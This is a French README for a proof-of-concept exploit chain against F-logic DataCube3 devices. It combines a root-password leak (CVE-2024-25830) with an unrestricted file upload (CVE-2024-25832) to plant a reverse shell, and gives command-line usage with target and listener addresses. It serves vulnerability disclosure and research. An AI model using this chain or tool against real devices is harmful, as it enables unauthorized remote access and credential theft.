
Script PoC pour CVE-2024-25832 : Chaîne d'exploitation de reverse shell, divulgation d'informations (fuite du mot de passe root) + téléchargement de fichier sans restriction dans DataCube3
Ce dépôt contient une preuve de concept (PoC) pour une chaîne d'exploitation en deux étapes ciblant les dispositifs DataCube3. Il combine CVE-2024-25830 (Contrôle d'accès inapproprié) pour extraire les mots de passe root et CVE-2024-25832 (Téléchargement de fichier sans restriction) pour déployer un script de shell inverse. Cette PoC complète l'analyse détaillée des vulnérabilités dans l'article de blog "DataCube3 Vulnerability Report".
Tous les dispositifs F-logic DataCube3 version 1.0.
# Usage: python datacube3.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python datacube3.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

À DES FINS ÉDUCATIVES UNIQUEMENT.